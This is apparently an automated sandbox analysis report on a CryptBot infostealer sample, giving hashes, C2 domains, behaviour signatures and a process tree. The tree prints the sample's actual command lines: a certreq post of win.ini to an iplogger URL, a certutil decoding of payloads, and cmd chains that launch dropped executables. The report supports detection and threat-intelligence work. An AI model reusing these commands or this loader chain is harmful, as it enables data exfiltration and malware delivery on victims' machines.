Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    26/03/2025, 00:27

General

  • Target

    021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe

  • Size

    1.8MB

  • MD5

    d8a8599e2325010e356d1bf13395e0af

  • SHA1

    689a59ba3a0c4cfcbae7201cc09a986bc968b8f2

  • SHA256

    021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba

  • SHA512

    a56632b88a8b5e2bb938ee68a6a672650d2386ea18975b9d58156f2ad9efac5e4d6fa574e4c28a213cffd5c44c0355c5005e04b9801c92fe2ceef4a342e08799

  • SSDEEP

    49152:6sOXm4VF5ZCVpSm3/gjkl0+827d/GpncQ:6nxwDf3IjX27ocQ

Malware Config

Extracted

Family

cryptbot

C2

nkoopw11.top

moraass08.top

Signatures

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • CryptBot payload 2 IoCs
  • Cryptbot family
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Deobfuscate/Decode Files or Information 1 TTPs 2 IoCs

    Payload decoded via CertUtil.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe
    "C:\Users\Admin\AppData\Local\Temp\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo UfkgJKZQP
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3016
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\SysWOW64\certreq.exe
        certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2288
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < OLicGk.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 1 ALq.Iqg
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2808
        • C:\Windows\SysWOW64\certutil.exe
          certutil -decode gvceXcfUhq.com U
          4⤵
          • Deobfuscate/Decode Files or Information
          • System Location Discovery: System Language Discovery
          PID:2676
        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com
          msdtc.com U
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com
            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com U
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            PID:2836
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious use of FindShellTrayWindow
              PID:964
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 3
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2756
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < iphPyYJYUVPAWekxoF.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 1 ovPEN.QDIv
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2740
        • C:\Windows\SysWOW64\certutil.exe
          certutil -decode QrHZW.com T
          4⤵
          • Deobfuscate/Decode Files or Information
          • System Location Discovery: System Language Discovery
          PID:2152
        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com
          lsm.com T
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1324
          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com
            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com T
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            PID:1552
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              PID:2872
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\kgbtigebeasd.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2972
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\nrahakvlfa.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:268

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\OLicGk.com

    Filesize

    2KB

    MD5

    5b26b054b239e5cdd8a52564c4dd30fa

    SHA1

    35e6270bb7ea3ecc0cf57f498a5f17f46556b7c9

    SHA256

    75e1b8cab3c3db586be98cbd92ef6faf045905f84b1734d4762307359ee4c348

    SHA512

    304e23e3b0f7c69fba53fe80ec7db08b473c32db4de6856c40babebf3e39304915e62d7ade6c3b2b95e3bc25ee2bdcdd15cc84e5b8c49f4ac13e29713f6f2939

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\QrHZW.com

    Filesize

    821KB

    MD5

    640da6e057ac8de9a2b6ba317929d4e7

    SHA1

    0a58e31adabf8476e4fd172cf84953fcc69b4e14

    SHA256

    b38b3d81ae5092431e2cf9f3300d066c2f026478560ed5260c466a7a07821169

    SHA512

    d121ae2d1cfa61164536ea706008351093ac0904c343c21d871c0ce5e0c2768244dfd0d958e09da244f004f208849479ed518e83359f3a6bcab7a86de89074c8

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\T

    Filesize

    597KB

    MD5

    c53f72e837ea0572f909e19d91e678cf

    SHA1

    9ba7fb7909541885d41a48129c7447e233b6e2ce

    SHA256

    52d870a46c1908c00976184750ed34d89d0b40f5d26f0af20934b3ed860b9238

    SHA512

    c924ea60c69e61ba7f1caa9f24873e398070849bc93ec9c7cfa4671d260fdf3212bf970cf468155aa110da34a1d5eaf7afd2d5388637eb8df9bba636556a8493

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\TEYCayDdYIwJDFmJ.com

    Filesize

    633KB

    MD5

    46758451c6c15d1c09352870a73e60cc

    SHA1

    0e9d51cc8653ca35ccdd9da42a3130637c4324f4

    SHA256

    f8612a22708c1ba366671ce4c4d46bf99201779291c475fc14d15d678af08c6d

    SHA512

    8b5759cbbc211315d643c4eff764981e955caa6090fd4fb1ea3f254c63588837fa9e437b60af44bdcae9977ea821cc01cf0bc639241540fa017d6a398358a49e

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\U

    Filesize

    622KB

    MD5

    d7e447dc959c49d3eb6248670e63398a

    SHA1

    2e4bcfb967b82bc60828e2d085341e8be79b96f5

    SHA256

    88dbe047efaffcd678d8d8fa607de8f436ef65a3526e0e10c34e29a9a19a5e03

    SHA512

    2bb9acabda08b36d856b43092cf09b8414c45e01f322a96399b7be4c0c847e99e9124c61cb398141139fca5dbf5d4466db8afe0de88bb8731917f06e1c4a9652

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\UucapEhaDdp.com

    Filesize

    120KB

    MD5

    51c9e8740229697c9cb5cfee1b8fea52

    SHA1

    003431e1689ba21b2ffc0698dd7b907abb544bca

    SHA256

    4fade13b32eb319931cb8c30c16eae8379dfafda2afa8170a37192d30c48ea79

    SHA512

    cac454e15521aee2e095be72436cb33312a7e954da9489a160985883aa8780cdf1d92c0a6f9a1c2dee33826b504d83573e7c3a90ffddd411fad6df72ecca52f7

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\gvceXcfUhq.com

    Filesize

    855KB

    MD5

    d1b5da220554ba0d23a0f3f1f7ef2db9

    SHA1

    631e49d601fe9267c9cb3a6fb9e0d2fa678227e5

    SHA256

    ab68413bb05cf334bd590b397633f4de104f4e2f67b1cf10772771313c3cc646

    SHA512

    c2a9605b966391e7ed110fc4645a6370c48022cd9aa43c039e69bc07162b5e1c424b26646ab403c5318baf1011cd042a470504cacf00e714b1b9a910387490e8

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\iphPyYJYUVPAWekxoF.com

    Filesize

    2KB

    MD5

    0ba0d0258c727b64c7505f52b1280a42

    SHA1

    4a975d76f17869cccb5385f80697e8b0594407cf

    SHA256

    e9d044d8a00fc501ba732ff6732a22372e5acc6bdf08689007c6876874273764

    SHA512

    bdf446185c829317b56e62758890e04a01d4b4da0df3eb2ffdd59216f9d93144d3d1f96d503c0e917b805e21dfa05e7627b5bd44fda230ad78f16116d6b38b72

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\yZwIFsEsLlrEAM.com

    Filesize

    921KB

    MD5

    392e5cc019e763f0019337277db81081

    SHA1

    9402765f17c7e2b0cf15520ffef56476a855ab2c

    SHA256

    852ed04ac131800dae464471a51a7d54063dad88ce1ebab7ce22fcab66900d01

    SHA512

    4e0de123e4ff6f40bacded145bc0505a73a2cf39ff01878b8703b1dd6fc0059d4ce1e39c0d6043b389b7ecee0126e326c6e258b0bf472bf297179b3b945db553

  • C:\Users\Admin\AppData\Local\Temp\CloXLITL8xrr\UCUJZdKgk7NdH.zip

    Filesize

    40KB

    MD5

    e470faa06bbdf099deb960bc3770b32e

    SHA1

    a97862d861091f3d0b17278ca7a2aee6e823baff

    SHA256

    cfb082074305b0f17ef2915dfcbfa1585286dfe5d1ec477b4f94cbae91cb074e

    SHA512

    7ace9de6191c1b18d4f5e7d1d51b9cc1951d327764ee92b271456c3b2a7b010b0390903377d8781ae27b973d8b04fb12bb1a279cb1ba085aec801db58f3d03af

  • C:\Users\Admin\AppData\Local\Temp\CloXLITL8xrr\_Files\_Information.txt

    Filesize

    8KB

    MD5

    0581a7fa09919cca84fe9eb11ce26646

    SHA1

    ff1c688cc9eeade16f01cc58ba3621f5844c3195

    SHA256

    c27c2cb87c612f2a6e379ed7c2dc9d00de92dff918043616078df96921aebc8f

    SHA512

    c0ee15efc56150ac28a85f047ed5f7515bc57b338c5e08675e2a5ebbf5a6cdb5d25c999f6bb034977f01a1fe82f30f35bcc86478c9b7e1b568079904a0fa7fe3

  • C:\Users\Admin\AppData\Local\Temp\CloXLITL8xrr\_Files\_Screen_Desktop.jpeg

    Filesize

    47KB

    MD5

    26c388b8fa4b0942c3c3324f4c23a280

    SHA1

    8bf96aa77aa35e85f4e78aabde4d216850f8b5b7

    SHA256

    c7fecb3bc3c84c218a43a3715ffcbe8d9dff9cba5828e8a682c2af71443e6907

    SHA512

    39ba0d7a8dd32e00a8248873f16f9141b360fd67a8e841eff392aef47f7815d43be54a5a93fecb515ef7d1dc0fdbae144ee12fbcdaf79df1b25aaa785b1456c2

  • C:\Users\Admin\AppData\Local\Temp\CloXLITL8xrr\files_\system_info.txt

    Filesize

    8KB

    MD5

    6268146ffb4be0ad707f854ea9b7a7c5

    SHA1

    af909cc3f2dd3a45be33ca7473c23ca12e2a67c4

    SHA256

    0711ab830cf252b31643d176930d771711fcac59b184837d9621d72e002afa48

    SHA512

    63155db6c626bc9492d54bbe0d0909a7debacb021bebbbb36495b7f47ae121a179fe9d83b91df35f3407665ddb605a27d20373418d5856f6b1bb653405c85fa1

  • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com

    Filesize

    921KB

    MD5

    7098bdf41092092927874259196e5d80

    SHA1

    7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

    SHA256

    140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

    SHA512

    dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

  • \Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe

    Filesize

    96KB

    MD5

    5e3830ee3282a53920e00784fec44cfd

    SHA1

    3e43d4ac8ea7efdf5921ad123f4eabd5648778ab

    SHA256

    4a35c36f3f41f977fe1f0174d43c8cb9bd25a823b5f2a1970e501d839e1f8276

    SHA512

    ad87e4db060630f5a85d4ba25e53ca81da163c7888c2b4beddba8433dbbccd3979679e5385e40a931830e3c34c0d1b8715146b5d300d7edbb554cb7cae43f775

  • memory/964-47-0x0000000000400000-0x00000000004A3000-memory.dmp

    Filesize

    652KB

  • memory/964-49-0x0000000000400000-0x00000000004A3000-memory.dmp

    Filesize

    652KB

  • memory/2872-268-0x0000000000400000-0x0000000000423000-memory.dmp

    Filesize

    140KB

  • memory/2872-270-0x0000000000400000-0x0000000000423000-memory.dmp

    Filesize

    140KB